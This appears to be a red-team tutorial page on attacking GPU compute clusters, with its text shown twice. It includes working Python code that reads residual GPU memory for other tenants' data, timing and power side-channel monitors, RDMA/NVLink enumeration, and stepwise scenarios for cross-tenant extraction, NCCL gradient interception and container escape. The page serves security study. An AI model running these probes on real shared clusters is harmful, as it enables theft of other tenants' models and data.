Attacking GPU Compute Clusters

expert14 min readUpdated 2026-03-15

Expert-level analysis of attacks against GPU compute clusters used for ML training and inference, including side-channel attacks on GPU memory, CUDA runtime exploitation, multi-tenant isolation failures, and RDMA network attacks.

gpu cuda side-channel multi-tenant rdma cluster-attacks

GPU compute clusters are the backbone of modern ML infrastructure. Organizations spend millions on NVIDIA DGX, AMD Instinct, and cloud GPU instances for training and serving models. The security of these clusters is a critical concern, yet GPU hardware and its associated software stack were designed primarily for performance, not isolation. This creates exploitable gaps that red teams can leverage to access other tenants' data, extract model weights, and disrupt training runs.

GPU Memory Architecture and Attack Surface

NVIDIA GPU Memory Hierarchy

Understanding the GPU memory hierarchy is essential for identifying data leakage opportunities:

┌──────────────────────────────────────────────────┐
│                  GPU Device                       │
│                                                    │
│  ┌──────────────────────────────────────────────┐ │
│  │            Global Memory (HBM)                │ │
│  │  ┌─────────────┐  ┌─────────────────────────┐│ │
│  │  │ Model Weights│  │ Activations / KV Cache  ││ │
│  │  └─────────────┘  └─────────────────────────┘│ │
│  │  ┌─────────────┐  ┌─────────────────────────┐│ │
│  │  │ Gradients    │  │ Optimizer State          ││ │
│  │  └─────────────┘  └─────────────────────────┘│ │
│  └──────────────────────────────────────────────┘ │
│                                                    │
│  ┌────────────┐  ┌────────────┐  ┌────────────┐  │
│  │    SM 0     │  │    SM 1     │  │    SM N     │  │
│  │ ┌────────┐  │  │ ┌────────┐  │  │ ┌────────┐  │  │
│  │ │Shared  │  │  │ │Shared  │  │  │ │Shared  │  │  │
│  │ │Memory  │  │  │ │Memory  │  │  │ │Memory  │  │  │
│  │ └────────┘  │  │ └────────┘  │  │ └────────┘  │  │
│  │ ┌────────┐  │  │ ┌────────┐  │  │ ┌────────┐  │  │
│  │ │L1 Cache│  │  │ │L1 Cache│  │  │ │L1 Cache│  │  │
│  │ └────────┘  │  │ └────────┘  │  │ └────────┘  │  │
│  └────────────┘  └────────────┘  └────────────┘  │
│                                                    │
│  ┌──────────────────────────────────────────────┐ │
│  │              L2 Cache (Shared)                │ │
│  └──────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────┘

Uninitialized Memory Exploitation

GPU memory is not automatically cleared between kernel launches or between processes sharing a GPU. This is the most accessible attack vector in multi-tenant environments:

import torch
import numpy as np
 
def probe_gpu_memory(allocation_size_mb: int = 512, num_probes: int = 10):
    """
    Probe GPU memory for residual data from previous allocations.
    In multi-tenant environments, this may contain fragments of
    other users' model weights, activations, or input data.
    """
    findings = []
 
    for probe_idx in range(num_probes):
        # Allocate without initialization — reads whatever is in memory
        tensor = torch.empty(
            allocation_size_mb * 1024 * 1024 // 4,  # float32 elements
            dtype=torch.float32,
            device="cuda"
        )
 
        # Analyze contents for non-zero patterns
        nonzero_ratio = (tensor != 0).float().mean().item()
        value_range = (tensor.min().item(), tensor.max().item())
 
        # Check for structured patterns (model weights have characteristic distributions)
        std = tensor.std().item()
        mean = tensor.abs().mean().item()
 
        if nonzero_ratio > 0.01:  # More than 1% non-zero indicates residual data
            findings.append({
                "probe": probe_idx,
                "nonzero_ratio": nonzero_ratio,
                "value_range": value_range,
                "std": std,
                "mean_abs": mean,
                "likely_content": classify_residual_data(std, mean),
            })
 
        del tensor
        torch.cuda.empty_cache()
 
    return findings
 
def classify_residual_data(std: float, mean_abs: float) -> str:
    """Heuristic classification of residual GPU memory contents."""
    if 0.01 < std < 0.1 and mean_abs < 0.05:
        return "likely_model_weights (small initialization)"
    elif 0.1 < std < 2.0:
        return "likely_activations_or_gradients"
    elif std > 10.0:
        return "likely_optimizer_state (Adam momentum/variance)"
    elif mean_abs < 1e-6:
        return "likely_zeroed_or_sparse"
    else:
        return "unknown_structured_data"

Side-Channel Attacks on GPU Workloads

Timing Side Channels

GPU kernel execution times leak information about the data being processed:

import torch
import time
 
def timing_side_channel_probe(target_gpu: int = 0):
    """
    Measure GPU kernel execution timing to infer characteristics
    of co-located workloads. Execution time correlates with:
    - Model size (number of parameters)
    - Batch size (number of inputs processed)
    - Sequence length (for transformer models)
    - Sparsity patterns in data
    """
    torch.cuda.set_device(target_gpu)
 
    timings = []
    for _ in range(1000):
        # Launch a small probe kernel
        probe = torch.randn(64, 64, device="cuda")
        torch.cuda.synchronize()
 
        start = time.perf_counter_ns()
        result = torch.matmul(probe, probe)
        torch.cuda.synchronize()
        end = time.perf_counter_ns()
 
        timings.append(end - start)
 
    timings = np.array(timings)
 
    # Timing variance indicates resource contention from co-located workloads
    return {
        "mean_ns": np.mean(timings),
        "std_ns": np.std(timings),
        "p99_ns": np.percentile(timings, 99),
        "bimodal": detect_bimodal_distribution(timings),
        "contention_detected": np.std(timings) > np.mean(timings) * 0.1,
    }
 
def detect_bimodal_distribution(data: np.ndarray) -> bool:
    """Bimodal timing suggests batch processing boundaries in co-located workload."""
    from scipy import stats
    _, p_value = stats.normaltest(data)
    return p_value < 0.001

Power and Thermal Side Channels

GPU power consumption and thermal readings are accessible through management interfaces and correlate with workload characteristics:

def monitor_gpu_power_channel(duration_seconds: int = 60, sample_rate_hz: int = 10):
    """
    Monitor GPU power consumption as a side channel.
    Power draw patterns reveal:
    - Training vs. inference workload type
    - Batch processing cadence
    - Model architecture characteristics
    """
    import subprocess
    import time
 
    readings = []
    interval = 1.0 / sample_rate_hz
 
    for _ in range(duration_seconds * sample_rate_hz):
        # nvidia-smi provides power and utilization data
        result = subprocess.run(
            ["nvidia-smi",
             "--query-gpu=power.draw,utilization.gpu,temperature.gpu,memory.used",
             "--format=csv,noheader,nounits"],
            capture_output=True, text=True
        )
 
        if result.returncode == 0:
            values = result.stdout.strip().split(", ")
            readings.append({
                "timestamp": time.time(),
                "power_w": float(values[0]),
                "util_pct": float(values[1]),
                "temp_c": float(values[2]),
                "mem_used_mb": float(values[3]),
            })
 
        time.sleep(interval)
 
    return analyze_power_patterns(readings)
 
def analyze_power_patterns(readings: list) -> dict:
    """Extract workload characteristics from power consumption patterns."""
    powers = [r["power_w"] for r in readings]
    utils = [r["util_pct"] for r in readings]
 
    # Detect periodic patterns (training loop cadence)
    from scipy.signal import find_peaks
    peaks, properties = find_peaks(powers, height=np.mean(powers))
 
    if len(peaks) > 2:
        intervals = np.diff(peaks)
        cadence = np.median(intervals) / 10  # Convert to seconds
 
        return {
            "workload_type": "training" if cadence > 1.0 else "inference",
            "batch_cadence_seconds": cadence,
            "peak_power_w": max(powers),
            "avg_power_w": np.mean(powers),
        }
 
    return {"workload_type": "inference_or_idle", "avg_power_w": np.mean(powers)}

Side Channel	Data Leaked	Accuracy	Requirements
Kernel timing	Model size, batch size, sequence length	Medium	Co-located process on same GPU
Power analysis	Training cadence, workload type	High	nvidia-smi access
Memory bandwidth	Data transfer patterns, model loading	Medium	Performance counter access
PCIe traffic	Host-device data movement patterns	Low	PCIe monitoring capability
Thermal patterns	Sustained vs. burst compute	Low	Temperature sensor access

Multi-Tenant GPU Isolation Mechanisms

NVIDIA Multi-Instance GPU (MIG)

MIG (Multi-Instance GPU) provides the strongest available isolation for GPU multi-tenancy:

def assess_mig_isolation(gpu_index: int = 0):
    """Assess MIG partition isolation on NVIDIA A100/H100 GPUs."""
    import subprocess
    import json
 
    findings = []
 
    # List MIG instances
    result = subprocess.run(
        ["nvidia-smi", "mig", "-lgi", "-i", str(gpu_index)],
        capture_output=True, text=True
    )
    findings.append({"mig_instances": result.stdout})
 
    # Check MIG mode status
    result = subprocess.run(
        ["nvidia-smi", "--query-gpu=mig.mode.current", "--format=csv,noheader",
         "-i", str(gpu_index)],
        capture_output=True, text=True
    )
 
    mig_enabled = "Enabled" in result.stdout
 
    if not mig_enabled:
        findings.append({
            "severity": "HIGH",
            "finding": "MIG not enabled on multi-tenant GPU",
            "impact": "No hardware isolation between tenants",
        })
 
    # Even with MIG, check for shared resources
    findings.append({
        "note": "MIG isolates compute and memory but shares: "
                "PCIe bus, NVLink, video encoder/decoder, "
                "GPU management processor",
    })
 
    return findings

NVIDIA Multi-Process Service (MPS)

MPS (Multi-Process Service) provides performance benefits but weaker isolation:

Isolation Mechanism	Compute Isolation	Memory Isolation	Fault Isolation	Performance Overhead
MIG	Hardware-partitioned SMs	Separate memory partitions	Full -- crash contained	0% (dedicated resources)
MPS	Shared SMs, time-multiplexed	Shared address space	None -- one crash kills all	Low
Time-slicing	Round-robin scheduling	No isolation	None	Medium (context switching)
vGPU	Hypervisor-mediated	Hypervisor-enforced	Full	5-15%

RDMA and Interconnect Attacks

InfiniBand and RoCE Exploitation

High-performance GPU clusters use RDMA for inter-node communication during distributed training:

def enumerate_rdma_endpoints():
    """
    Enumerate RDMA-capable network interfaces and endpoints.
    RDMA traffic bypasses the kernel network stack, meaning
    standard firewall rules and network policies do not apply.
    """
    import subprocess
 
    findings = []
 
    # Check for RDMA devices
    result = subprocess.run(["ibv_devices"], capture_output=True, text=True)
    if result.returncode == 0:
        findings.append({
            "finding": "RDMA devices present",
            "devices": result.stdout,
            "severity": "INFO",
        })
 
    # Check for InfiniBand subnet manager
    result = subprocess.run(["ibstat"], capture_output=True, text=True)
    if result.returncode == 0:
        findings.append({
            "finding": "InfiniBand status",
            "status": result.stdout,
        })
 
    # Enumerate RDMA connections
    result = subprocess.run(
        ["rdma", "resource", "show", "cm_id"],
        capture_output=True, text=True
    )
    if result.returncode == 0:
        findings.append({
            "finding": "Active RDMA connections",
            "connections": result.stdout,
            "note": "These connections bypass kernel network stack and firewalls",
        })
 
    # Check for GPUDirect RDMA capability
    result = subprocess.run(
        ["nvidia-smi", "nvlink", "--status"],
        capture_output=True, text=True
    )
    if result.returncode == 0:
        findings.append({
            "finding": "NVLink status (GPUDirect capable)",
            "status": result.stdout,
        })
 
    return findings

NVLink and NVSwitch Attacks

In multi-GPU systems (DGX, HGX), NVLink provides direct GPU-to-GPU memory access:

def probe_nvlink_topology():
    """
    Map NVLink topology to identify potential cross-GPU
    data access paths. NVLink enables GPUDirect which allows
    one GPU to directly read/write another GPU's memory.
    """
    import subprocess
 
    result = subprocess.run(
        ["nvidia-smi", "topo", "-m"],
        capture_output=True, text=True
    )
 
    topology = result.stdout
 
    # Parse topology matrix for NVLink connections
    # NV# indicates NVLink connection with # links
    # SYS indicates cross-socket (slower)
    # PHB indicates same PCIe host bridge
 
    return {
        "topology": topology,
        "note": "GPUs connected via NVLink can perform direct memory "
                "access (peer-to-peer). If GPU 0 and GPU 1 are NVLink-connected "
                "and run different tenants' workloads, a CUDA program on GPU 0 "
                "can potentially read GPU 1's memory via cuMemcpyPeer.",
    }

CUDA Runtime Exploitation

Driver and Runtime Vulnerabilities

The CUDA software stack presents a significant attack surface:

Component	Vulnerability Class	Example CVEs	Impact
NVIDIA Kernel Driver	Privilege escalation	CVE-2024-0071, CVE-2024-0074	Host compromise from container
CUDA Runtime	Memory corruption	CVE-2023-31021	Code execution in GPU context
cuDNN	Buffer overflow	Various	Arbitrary code execution
NCCL	Unauthenticated access	Design issue	Distributed training data interception
nvidia-persistenced	Local privilege escalation	CVE-2024-0090	Root access from GPU user

def assess_cuda_attack_surface():
    """Enumerate CUDA stack components and known vulnerability exposure."""
    import subprocess
 
    components = {}
 
    # Driver version
    result = subprocess.run(
        ["nvidia-smi", "--query-gpu=driver_version", "--format=csv,noheader"],
        capture_output=True, text=True
    )
    components["driver_version"] = result.stdout.strip()
 
    # CUDA version
    result = subprocess.run(
        ["nvcc", "--version"], capture_output=True, text=True
    )
    components["cuda_version"] = result.stdout
 
    # Check for known vulnerable driver versions
    driver_ver = components["driver_version"]
    known_vulnerable = {
        "535.104": ["CVE-2024-0071"],  # Example
        "535.86": ["CVE-2023-31021"],
    }
 
    for vuln_ver, cves in known_vulnerable.items():
        if driver_ver.startswith(vuln_ver):
            components["vulnerabilities"] = cves
 
    return components

Cluster-Level Attack Scenarios

Scenario 1: Cross-Tenant Data Extraction

1. Attacker obtains legitimate access to a GPU instance in a shared cluster
2. Probe uninitialized GPU memory for residual data from previous tenant
3. Use timing side channels to determine when co-located workload processes batches
4. Allocate and read GPU memory immediately after co-located workload releases it
5. Reconstruct model weights or training data fragments from recovered memory

Scenario 2: Distributed Training Interception

1. Gain access to the training cluster network (InfiniBand or RoCE fabric)
2. Enumerate NCCL communication endpoints (default: no authentication)
3. Join the NCCL communication ring by impersonating a training worker
4. Intercept gradient updates transmitted between nodes during allreduce operations
5. Reconstruct model updates and potentially training data from gradient information

Scenario 3: GPU-Assisted Container Escape

1. From within a GPU-enabled container, access /dev/nvidia* device files
2. Use GPU memory mapping to probe host memory regions accessible through DMA
3. Exploit NVIDIA driver vulnerabilities for kernel-level privilege escalation
4. Use GPU DMA capabilities to read or write host memory outside container boundaries
5. Establish persistence through GPU firmware or driver-level modifications

Attacking AI Deployments -- general deployment infrastructure attacks
Kubernetes Security for ML Workloads -- Kubernetes-specific ML infrastructure security
Infrastructure Exploitation -- broader infrastructure exploitation techniques
Model Supply Chain Risks -- model-level supply chain attacks
Distributed Training Attacks -- attacking the training process itself

References

Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (2018) - Foundational research demonstrating practical GPU side-channel attacks across co-located processes
Wei et al., "Leaky DNN: Stealing Deep-Learning Model Secret with GPU Context-Switching Side-Channel" (2020) - GPU context switching as a model extraction side channel
NVIDIA Multi-Instance GPU User Guide (2025) - Official MIG documentation covering partition configurations and isolation guarantees
NVIDIA Container Toolkit Security Best Practices (2025) - Security guidance for GPU containers including device isolation
Hu et al., "Security Analysis of RDMA-based Data Center Networks" (2023) - RDMA security analysis in data center environments

Knowledge Check

Why are standard Kubernetes network policies insufficient for securing GPU cluster communication during distributed training?

Edit this page on GitHub

Attacking GPU Compute Clusters

expert14 min readUpdated 2026-03-15

gpu cuda side-channel multi-tenant rdma cluster-attacks

GPU Memory Architecture and Attack Surface

NVIDIA GPU Memory Hierarchy

Understanding the GPU memory hierarchy is essential for identifying data leakage opportunities:

┌──────────────────────────────────────────────────┐
│                  GPU Device                       │
│                                                    │
│  ┌──────────────────────────────────────────────┐ │
│  │            Global Memory (HBM)                │ │
│  │  ┌─────────────┐  ┌─────────────────────────┐│ │
│  │  │ Model Weights│  │ Activations / KV Cache  ││ │
│  │  └─────────────┘  └─────────────────────────┘│ │
│  │  ┌─────────────┐  ┌─────────────────────────┐│ │
│  │  │ Gradients    │  │ Optimizer State          ││ │
│  │  └─────────────┘  └─────────────────────────┘│ │
│  └──────────────────────────────────────────────┘ │
│                                                    │
│  ┌────────────┐  ┌────────────┐  ┌────────────┐  │
│  │    SM 0     │  │    SM 1     │  │    SM N     │  │
│  │ ┌────────┐  │  │ ┌────────┐  │  │ ┌────────┐  │  │
│  │ │Shared  │  │  │ │Shared  │  │  │ │Shared  │  │  │
│  │ │Memory  │  │  │ │Memory  │  │  │ │Memory  │  │  │
│  │ └────────┘  │  │ └────────┘  │  │ └────────┘  │  │
│  │ ┌────────┐  │  │ ┌────────┐  │  │ ┌────────┐  │  │
│  │ │L1 Cache│  │  │ │L1 Cache│  │  │ │L1 Cache│  │  │
│  │ └────────┘  │  │ └────────┘  │  │ └────────┘  │  │
│  └────────────┘  └────────────┘  └────────────┘  │
│                                                    │
│  ┌──────────────────────────────────────────────┐ │
│  │              L2 Cache (Shared)                │ │
│  └──────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────┘

Uninitialized Memory Exploitation

GPU memory is not automatically cleared between kernel launches or between processes sharing a GPU. This is the most accessible attack vector in multi-tenant environments:

import torch
import numpy as np
 
def probe_gpu_memory(allocation_size_mb: int = 512, num_probes: int = 10):
    """
    Probe GPU memory for residual data from previous allocations.
    In multi-tenant environments, this may contain fragments of
    other users' model weights, activations, or input data.
    """
    findings = []
 
    for probe_idx in range(num_probes):
        # Allocate without initialization — reads whatever is in memory
        tensor = torch.empty(
            allocation_size_mb * 1024 * 1024 // 4,  # float32 elements
            dtype=torch.float32,
            device="cuda"
        )
 
        # Analyze contents for non-zero patterns
        nonzero_ratio = (tensor != 0).float().mean().item()
        value_range = (tensor.min().item(), tensor.max().item())
 
        # Check for structured patterns (model weights have characteristic distributions)
        std = tensor.std().item()
        mean = tensor.abs().mean().item()
 
        if nonzero_ratio > 0.01:  # More than 1% non-zero indicates residual data
            findings.append({
                "probe": probe_idx,
                "nonzero_ratio": nonzero_ratio,
                "value_range": value_range,
                "std": std,
                "mean_abs": mean,
                "likely_content": classify_residual_data(std, mean),
            })
 
        del tensor
        torch.cuda.empty_cache()
 
    return findings
 
def classify_residual_data(std: float, mean_abs: float) -> str:
    """Heuristic classification of residual GPU memory contents."""
    if 0.01 < std < 0.1 and mean_abs < 0.05:
        return "likely_model_weights (small initialization)"
    elif 0.1 < std < 2.0:
        return "likely_activations_or_gradients"
    elif std > 10.0:
        return "likely_optimizer_state (Adam momentum/variance)"
    elif mean_abs < 1e-6:
        return "likely_zeroed_or_sparse"
    else:
        return "unknown_structured_data"

Side-Channel Attacks on GPU Workloads

Timing Side Channels

GPU kernel execution times leak information about the data being processed:

import torch
import time
 
def timing_side_channel_probe(target_gpu: int = 0):
    """
    Measure GPU kernel execution timing to infer characteristics
    of co-located workloads. Execution time correlates with:
    - Model size (number of parameters)
    - Batch size (number of inputs processed)
    - Sequence length (for transformer models)
    - Sparsity patterns in data
    """
    torch.cuda.set_device(target_gpu)
 
    timings = []
    for _ in range(1000):
        # Launch a small probe kernel
        probe = torch.randn(64, 64, device="cuda")
        torch.cuda.synchronize()
 
        start = time.perf_counter_ns()
        result = torch.matmul(probe, probe)
        torch.cuda.synchronize()
        end = time.perf_counter_ns()
 
        timings.append(end - start)
 
    timings = np.array(timings)
 
    # Timing variance indicates resource contention from co-located workloads
    return {
        "mean_ns": np.mean(timings),
        "std_ns": np.std(timings),
        "p99_ns": np.percentile(timings, 99),
        "bimodal": detect_bimodal_distribution(timings),
        "contention_detected": np.std(timings) > np.mean(timings) * 0.1,
    }
 
def detect_bimodal_distribution(data: np.ndarray) -> bool:
    """Bimodal timing suggests batch processing boundaries in co-located workload."""
    from scipy import stats
    _, p_value = stats.normaltest(data)
    return p_value < 0.001

Power and Thermal Side Channels

GPU power consumption and thermal readings are accessible through management interfaces and correlate with workload characteristics:

def monitor_gpu_power_channel(duration_seconds: int = 60, sample_rate_hz: int = 10):
    """
    Monitor GPU power consumption as a side channel.
    Power draw patterns reveal:
    - Training vs. inference workload type
    - Batch processing cadence
    - Model architecture characteristics
    """
    import subprocess
    import time
 
    readings = []
    interval = 1.0 / sample_rate_hz
 
    for _ in range(duration_seconds * sample_rate_hz):
        # nvidia-smi provides power and utilization data
        result = subprocess.run(
            ["nvidia-smi",
             "--query-gpu=power.draw,utilization.gpu,temperature.gpu,memory.used",
             "--format=csv,noheader,nounits"],
            capture_output=True, text=True
        )
 
        if result.returncode == 0:
            values = result.stdout.strip().split(", ")
            readings.append({
                "timestamp": time.time(),
                "power_w": float(values[0]),
                "util_pct": float(values[1]),
                "temp_c": float(values[2]),
                "mem_used_mb": float(values[3]),
            })
 
        time.sleep(interval)
 
    return analyze_power_patterns(readings)
 
def analyze_power_patterns(readings: list) -> dict:
    """Extract workload characteristics from power consumption patterns."""
    powers = [r["power_w"] for r in readings]
    utils = [r["util_pct"] for r in readings]
 
    # Detect periodic patterns (training loop cadence)
    from scipy.signal import find_peaks
    peaks, properties = find_peaks(powers, height=np.mean(powers))
 
    if len(peaks) > 2:
        intervals = np.diff(peaks)
        cadence = np.median(intervals) / 10  # Convert to seconds
 
        return {
            "workload_type": "training" if cadence > 1.0 else "inference",
            "batch_cadence_seconds": cadence,
            "peak_power_w": max(powers),
            "avg_power_w": np.mean(powers),
        }
 
    return {"workload_type": "inference_or_idle", "avg_power_w": np.mean(powers)}

Side Channel	Data Leaked	Accuracy	Requirements
Kernel timing	Model size, batch size, sequence length	Medium	Co-located process on same GPU
Power analysis	Training cadence, workload type	High	nvidia-smi access
Memory bandwidth	Data transfer patterns, model loading	Medium	Performance counter access
PCIe traffic	Host-device data movement patterns	Low	PCIe monitoring capability
Thermal patterns	Sustained vs. burst compute	Low	Temperature sensor access

Multi-Tenant GPU Isolation Mechanisms

NVIDIA Multi-Instance GPU (MIG)

MIG (Multi-Instance GPU) provides the strongest available isolation for GPU multi-tenancy:

def assess_mig_isolation(gpu_index: int = 0):
    """Assess MIG partition isolation on NVIDIA A100/H100 GPUs."""
    import subprocess
    import json
 
    findings = []
 
    # List MIG instances
    result = subprocess.run(
        ["nvidia-smi", "mig", "-lgi", "-i", str(gpu_index)],
        capture_output=True, text=True
    )
    findings.append({"mig_instances": result.stdout})
 
    # Check MIG mode status
    result = subprocess.run(
        ["nvidia-smi", "--query-gpu=mig.mode.current", "--format=csv,noheader",
         "-i", str(gpu_index)],
        capture_output=True, text=True
    )
 
    mig_enabled = "Enabled" in result.stdout
 
    if not mig_enabled:
        findings.append({
            "severity": "HIGH",
            "finding": "MIG not enabled on multi-tenant GPU",
            "impact": "No hardware isolation between tenants",
        })
 
    # Even with MIG, check for shared resources
    findings.append({
        "note": "MIG isolates compute and memory but shares: "
                "PCIe bus, NVLink, video encoder/decoder, "
                "GPU management processor",
    })
 
    return findings

NVIDIA Multi-Process Service (MPS)

MPS (Multi-Process Service) provides performance benefits but weaker isolation:

Isolation Mechanism	Compute Isolation	Memory Isolation	Fault Isolation	Performance Overhead
MIG	Hardware-partitioned SMs	Separate memory partitions	Full -- crash contained	0% (dedicated resources)
MPS	Shared SMs, time-multiplexed	Shared address space	None -- one crash kills all	Low
Time-slicing	Round-robin scheduling	No isolation	None	Medium (context switching)
vGPU	Hypervisor-mediated	Hypervisor-enforced	Full	5-15%

RDMA and Interconnect Attacks

InfiniBand and RoCE Exploitation

High-performance GPU clusters use RDMA for inter-node communication during distributed training:

def enumerate_rdma_endpoints():
    """
    Enumerate RDMA-capable network interfaces and endpoints.
    RDMA traffic bypasses the kernel network stack, meaning
    standard firewall rules and network policies do not apply.
    """
    import subprocess
 
    findings = []
 
    # Check for RDMA devices
    result = subprocess.run(["ibv_devices"], capture_output=True, text=True)
    if result.returncode == 0:
        findings.append({
            "finding": "RDMA devices present",
            "devices": result.stdout,
            "severity": "INFO",
        })
 
    # Check for InfiniBand subnet manager
    result = subprocess.run(["ibstat"], capture_output=True, text=True)
    if result.returncode == 0:
        findings.append({
            "finding": "InfiniBand status",
            "status": result.stdout,
        })
 
    # Enumerate RDMA connections
    result = subprocess.run(
        ["rdma", "resource", "show", "cm_id"],
        capture_output=True, text=True
    )
    if result.returncode == 0:
        findings.append({
            "finding": "Active RDMA connections",
            "connections": result.stdout,
            "note": "These connections bypass kernel network stack and firewalls",
        })
 
    # Check for GPUDirect RDMA capability
    result = subprocess.run(
        ["nvidia-smi", "nvlink", "--status"],
        capture_output=True, text=True
    )
    if result.returncode == 0:
        findings.append({
            "finding": "NVLink status (GPUDirect capable)",
            "status": result.stdout,
        })
 
    return findings

NVLink and NVSwitch Attacks

In multi-GPU systems (DGX, HGX), NVLink provides direct GPU-to-GPU memory access:

def probe_nvlink_topology():
    """
    Map NVLink topology to identify potential cross-GPU
    data access paths. NVLink enables GPUDirect which allows
    one GPU to directly read/write another GPU's memory.
    """
    import subprocess
 
    result = subprocess.run(
        ["nvidia-smi", "topo", "-m"],
        capture_output=True, text=True
    )
 
    topology = result.stdout
 
    # Parse topology matrix for NVLink connections
    # NV# indicates NVLink connection with # links
    # SYS indicates cross-socket (slower)
    # PHB indicates same PCIe host bridge
 
    return {
        "topology": topology,
        "note": "GPUs connected via NVLink can perform direct memory "
                "access (peer-to-peer). If GPU 0 and GPU 1 are NVLink-connected "
                "and run different tenants' workloads, a CUDA program on GPU 0 "
                "can potentially read GPU 1's memory via cuMemcpyPeer.",
    }

CUDA Runtime Exploitation

Driver and Runtime Vulnerabilities

The CUDA software stack presents a significant attack surface:

Component	Vulnerability Class	Example CVEs	Impact
NVIDIA Kernel Driver	Privilege escalation	CVE-2024-0071, CVE-2024-0074	Host compromise from container
CUDA Runtime	Memory corruption	CVE-2023-31021	Code execution in GPU context
cuDNN	Buffer overflow	Various	Arbitrary code execution
NCCL	Unauthenticated access	Design issue	Distributed training data interception
nvidia-persistenced	Local privilege escalation	CVE-2024-0090	Root access from GPU user

def assess_cuda_attack_surface():
    """Enumerate CUDA stack components and known vulnerability exposure."""
    import subprocess
 
    components = {}
 
    # Driver version
    result = subprocess.run(
        ["nvidia-smi", "--query-gpu=driver_version", "--format=csv,noheader"],
        capture_output=True, text=True
    )
    components["driver_version"] = result.stdout.strip()
 
    # CUDA version
    result = subprocess.run(
        ["nvcc", "--version"], capture_output=True, text=True
    )
    components["cuda_version"] = result.stdout
 
    # Check for known vulnerable driver versions
    driver_ver = components["driver_version"]
    known_vulnerable = {
        "535.104": ["CVE-2024-0071"],  # Example
        "535.86": ["CVE-2023-31021"],
    }
 
    for vuln_ver, cves in known_vulnerable.items():
        if driver_ver.startswith(vuln_ver):
            components["vulnerabilities"] = cves
 
    return components

Cluster-Level Attack Scenarios

Scenario 1: Cross-Tenant Data Extraction

1. Attacker obtains legitimate access to a GPU instance in a shared cluster
2. Probe uninitialized GPU memory for residual data from previous tenant
3. Use timing side channels to determine when co-located workload processes batches
4. Allocate and read GPU memory immediately after co-located workload releases it
5. Reconstruct model weights or training data fragments from recovered memory

Scenario 2: Distributed Training Interception

1. Gain access to the training cluster network (InfiniBand or RoCE fabric)
2. Enumerate NCCL communication endpoints (default: no authentication)
3. Join the NCCL communication ring by impersonating a training worker
4. Intercept gradient updates transmitted between nodes during allreduce operations
5. Reconstruct model updates and potentially training data from gradient information

Scenario 3: GPU-Assisted Container Escape

1. From within a GPU-enabled container, access /dev/nvidia* device files
2. Use GPU memory mapping to probe host memory regions accessible through DMA
3. Exploit NVIDIA driver vulnerabilities for kernel-level privilege escalation
4. Use GPU DMA capabilities to read or write host memory outside container boundaries
5. Establish persistence through GPU firmware or driver-level modifications

Attacking AI Deployments -- general deployment infrastructure attacks
Kubernetes Security for ML Workloads -- Kubernetes-specific ML infrastructure security
Infrastructure Exploitation -- broader infrastructure exploitation techniques
Model Supply Chain Risks -- model-level supply chain attacks
Distributed Training Attacks -- attacking the training process itself

References

Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (2018) - Foundational research demonstrating practical GPU side-channel attacks across co-located processes
Wei et al., "Leaky DNN: Stealing Deep-Learning Model Secret with GPU Context-Switching Side-Channel" (2020) - GPU context switching as a model extraction side channel
NVIDIA Multi-Instance GPU User Guide (2025) - Official MIG documentation covering partition configurations and isolation guarantees
NVIDIA Container Toolkit Security Best Practices (2025) - Security guidance for GPU containers including device isolation
Hu et al., "Security Analysis of RDMA-based Data Center Networks" (2023) - RDMA security analysis in data center environments

Knowledge Check

Why are standard Kubernetes network policies insufficient for securing GPU cluster communication during distributed training?

Edit this page on GitHub

Attacking GPU Compute Clusters

Related articles

Attacking GPU Compute Clusters

Related articles